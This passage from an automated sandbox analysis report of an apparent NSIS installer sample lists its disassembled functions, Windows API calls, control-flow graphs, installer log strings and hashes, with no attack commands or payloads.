                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 2295610775-0
                                                                                                                                                                                                                                                                        • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                                                                                                                                                                                                        • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8
                                                                                                                                                                                                                                                                        Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 56 405479-40548b 57 405491-405497 56->57 58 4055cd-4055dc 56->58 57->58 59 40549d-4054a6 57->59 60 40562b-405640 58->60 61 4055de-405626 GetDlgItem * 2 call 403d3f SetClassLongW call 40141d 58->61 62 4054a8-4054b5 SetWindowPos 59->62 63 4054bb-4054be 59->63 65 405680-405685 call 403daf 60->65 66 405642-405645 60->66 61->60 62->63 68 4054c0-4054d2 ShowWindow 63->68 69 4054d8-4054de 63->69 74 40568a-4056a5 65->74 71 405647-405652 call 40139d 66->71 72 405678-40567a 66->72 68->69 75 4054e0-4054f5 DestroyWindow 69->75 76 4054fa-4054fd 69->76 71->72 93 405654-405673 SendMessageW 71->93 72->65 73 405920 72->73 81 405922-405929 73->81 79 4056a7-4056a9 call 40141d 74->79 80 4056ae-4056b4 74->80 82 4058fd-405903 75->82 84 405510-405516 76->84 85 4054ff-40550b SetWindowLongW 76->85 79->80 89 4056ba-4056c5 80->89 90 4058de-4058f7 DestroyWindow KiUserCallbackDispatcher 80->90 82->73 87 405905-40590b 82->87 91 4055b9-4055c8 call 403dca 84->91 92 40551c-40552d GetDlgItem 84->92 85->81 87->73 95 40590d-405916 ShowWindow 87->95 89->90 96 4056cb-405718 call 406805 call 403d3f * 3 GetDlgItem 89->96 90->82 91->81 97 40554c-40554f 92->97 98 40552f-405546 SendMessageW IsWindowEnabled 92->98 93->81 95->73 126 405723-40575f ShowWindow KiUserCallbackDispatcher call 403d85 EnableWindow 96->126 127 40571a-405720 96->127 101 405551-405552 97->101 102 405554-405557 97->102 98->73 98->97 103 405582-405587 call 403d18 101->103 104 405565-40556a 102->104 105 405559-40555f 102->105 103->91 107 4055a0-4055b3 SendMessageW 104->107 109 40556c-405572 104->109 105->107 108 405561-405563 105->108 107->91 108->103 112 405574-40557a call 40141d 109->112 113 405589-405592 call 40141d 109->113 122 405580 112->122 113->91 123 405594-40559e 113->123 122->103 123->122 130 405761-405762 126->130 131 405764 126->131 127->126 132 405766-405794 GetSystemMenu EnableMenuItem SendMessageW 130->132 131->132 133 405796-4057a7 SendMessageW 132->133 134 4057a9 132->134 135 4057af-4057ed call 403d98 call 406009 lstrlenW call 406805 SetWindowTextW call 40139d 133->135 134->135 135->74 144 4057f3-4057f5 135->144 144->74 145 4057fb-4057ff 144->145 146 405801-405807 145->146 147 40581e-405832 DestroyWindow 145->147 146->73 148 40580d-405813 146->148 147->82 149 405838-405865 CreateDialogParamW 147->149 148->74 150 405819 148->150 149->82 151 40586b-4058c2 call 403d3f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 149->151 150->73 151->73 156 4058c4-4058d7 ShowWindow call 403daf 151->156 158 4058dc 156->158 158->82
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?), ref: 004054D2
                                                                                                                                                                                                                                                                        • DestroyWindow.USER32 ref: 004054E6
                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,?), ref: 00405523
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                                                                                                                                                                                                                                        • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                                                                                                                                                                                                                                        • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                                                                                                                                                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                                                                                                                                                                                                                                                        • EnableWindow.USER32(?,?), ref: 00405757
                                                                                                                                                                                                                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                                                                                                                                                                                                                                        • EnableMenuItem.USER32(00000000), ref: 00405774
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                                                                                                                                                                                                                                        • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                                                        • String ID: @rD
                                                                                                                                                                                                                                                                        • API String ID: 3282139019-3814967855
                                                                                                                                                                                                                                                                        • Opcode ID: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
                                                                                                                                                                                                                                                                        • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E
                                                                                                                                                                                                                                                                        Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 159 4015a0-4015f4 160 4030e3-4030ec 159->160 161 4015fa 159->161 185 4030ee-4030f2 160->185 163 401601-401611 call 4062a3 161->163 164 401742-40174f 161->164 165 401962-40197d call 40145c GetFullPathNameW 161->165 166 4019ca-4019e6 call 40145c SearchPathW 161->166 167 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 161->167 168 401650-40166d call 40137e call 4062a3 call 40139d 161->168 169 4017b1-4017d8 call 40145c call 4062a3 call 405d59 161->169 170 401672-401686 call 40145c call 4062a3 161->170 171 401693-4016ac call 401446 call 4062a3 161->171 172 401715-401731 161->172 173 401616-40162d call 40145c call 4062a3 call 404f72 161->173 174 4016d6-4016db 161->174 175 401736-4030de 161->175 176 401897-4018a7 call 40145c call 4062d5 161->176 177 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 161->177 178 40163c-401645 161->178 179 4016bd-4016d1 call 4062a3 SetForegroundWindow 161->179 163->185 189 401751-401755 ShowWindow 164->189 190 401758-40175f 164->190 224 4019a3-4019a8 165->224 225 40197f-401984 165->225 166->160 217 4019ec-4019f8 166->217 167->160 242 40179a-4017a6 call 4062a3 167->242 168->185 264 401864-40186c 169->264 265 4017de-4017fc call 405d06 CreateDirectoryW 169->265 243 401689-40168e call 404f72 170->243 248 4016b1-4016b8 Sleep 171->248 249 4016ae-4016b0 171->249 172->185 186 401632-401637 173->186 183 401702-401710 174->183 184 4016dd-4016fd call 401446 174->184 175->160 219 4030de call 405f51 175->219 244 4018c2-4018d6 call 4062a3 176->244 245 4018a9-4018bd call 4062a3 176->245 272 401912-401919 177->272 273 40191e-401921 177->273 178->186 187 401647-40164e PostQuitMessage 178->187 179->160 183->160 184->160 186->185 187->186 189->190 190->160 208 401765-401769 ShowWindow 190->208 208->160 217->160 219->160 228 4019af-4019b2 224->228 225->228 235 401986-401989 225->235 228->160 238 4019b8-4019c5 GetShortPathNameW 228->238 235->228 246 40198b-401993 call 4062d5 235->246 238->160 259 4017ab-4017ac 242->259 243->160 244->185 245->185 246->224 269 401995-4019a1 call 406009 246->269 248->160 249->248 259->160 267 401890-401892 264->267 268 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 264->268 277 401846-40184e call 4062a3 265->277 278 4017fe-401809 GetLastError 265->278 267->243 268->160 269->228 272->243 279 401923-40192b call 4062d5 273->279 280 40194a-401950 273->280 292 401853-401854 277->292 283 401827-401832 GetFileAttributesW 278->283 284 40180b-401825 GetLastError call 4062a3 278->284 279->280 298 40192d-401948 call 406c68 call 404f72 279->298 288 401957-40195d call 4062a3 280->288 290 401834-401844 call 4062a3 283->290 291 401855-40185e 283->291 284->291 288->259 290->292 291->264 291->265 292->291 298->288
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                                                                                                        • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                                                                                                        • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                                                                                                        • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                                                                                                        • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                                                                                                        • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                                                                                                        • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                                                                                                        • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                                                                                                        • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                                                                                                                        • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                                                                                                        • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                                                                                                        • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                                                                                                        • BringToFront, xrefs: 004016BD
                                                                                                                                                                                                                                                                        • Jump: %d, xrefs: 00401602
                                                                                                                                                                                                                                                                        • Call: %d, xrefs: 0040165A
                                                                                                                                                                                                                                                                        • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                                                                                                        • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                                                                                                        • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                                                                                                        • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                                                                                                        • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                                                                                                                        • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                                                                                                        • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                                                                                                        • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                                                                                                        • API String ID: 2872004960-3619442763
                                                                                                                                                                                                                                                                        • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                                                                                                                                                                                                                        • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE
                                                                                                                                                                                                                                                                        Function 0040592C Relevance: 44.0, APIs: 15, Strings: 10, Instructions: 233stringregistrylibraryCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 426 40592c-405944 call 4062fc 429 405946-405956 call 405f51 426->429 430 405958-405990 call 405ed3 426->430 438 4059b3-4059dc call 403e95 call 40677e 429->438 435 405992-4059a3 call 405ed3 430->435 436 4059a8-4059ae lstrcatW 430->436 435->436 436->438 444 405a70-405a78 call 40677e 438->444 445 4059e2-4059e7 438->445 451 405a86-405a8d 444->451 452 405a7a-405a81 call 406805 444->452 445->444 446 4059ed-405a15 call 405ed3 445->446 446->444 453 405a17-405a1b 446->453 455 405aa6-405acb LoadImageW 451->455 456 405a8f-405a95 451->456 452->451 460 405a1d-405a2c call 405d06 453->460 461 405a2f-405a3b lstrlenW 453->461 458 405ad1-405b13 RegisterClassW 455->458 459 405b66-405b6e call 40141d 455->459 456->455 457 405a97-405a9c call 403e74 456->457 457->455 465 405c35 458->465 466 405b19-405b61 SystemParametersInfoW CreateWindowExW 458->466 478 405b70-405b73 459->478 479 405b78-405b83 call 403e95 459->479 460->461 462 405a63-405a6b call 406722 call 406009 461->462 463 405a3d-405a4b lstrcmpiW 461->463 462->444 463->462 470 405a4d-405a57 GetFileAttributesW 463->470 469 405c37-405c3e 465->469 466->459 475 405a59-405a5b 470->475 476 405a5d-405a5e call 406751 470->476 475->462 475->476 476->462 478->469 484 405b89-405ba6 ShowWindow LoadLibraryW 479->484 485 405c0c-405c0d call 405047 479->485 487 405ba8-405bad LoadLibraryW 484->487 488 405baf-405bc1 GetClassInfoW 484->488 491 405c12-405c14 485->491 487->488 489 405bc3-405bd3 GetClassInfoW RegisterClassW 488->489 490 405bd9-405bfc DialogBoxParamW call 40141d 488->490 489->490 495 405c01-405c0a call 403c68 490->495 493 405c16-405c1c 491->493 494 405c2e-405c30 call 40141d 491->494 493->478 496 405c22-405c29 call 40141d 493->496 494->465 495->469 496->478
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                          • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                                                                                                                                                                                          • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                                                                                                                                                                                          • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                                                                                                                                                                                                                                        • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNEL32(: Completed), ref: 00405A4E
                                                                                                                                                                                                                                                                          • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                                                                                                                                                                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                                                                                                                                                                                                                                        • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                                                                                                                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                                                                                                                                                                                                                                          • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                                                                                                                                                                                                                                        • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                                                                                                                                                                                                                                        • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                                                                                                                                                                                                                                        • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                                                                                                                                                                                                                                        • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                        • String ID: .DEFAULT\Control Panel\International$.exe$: Completed$@rD$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                                                        • API String ID: 608394941-2509908559
                                                                                                                                                                                                                                                                        • Opcode ID: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
                                                                                                                                                                                                                                                                        • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E
                                                                                                                                                                                                                                                                        Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(00000000,00000000,155,004CB0B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                                                                                        • CompareFileTime.KERNEL32(-00000014,?,155,155,00000000,00000000,155,004CB0B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                                                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                                                                                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                                                                                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
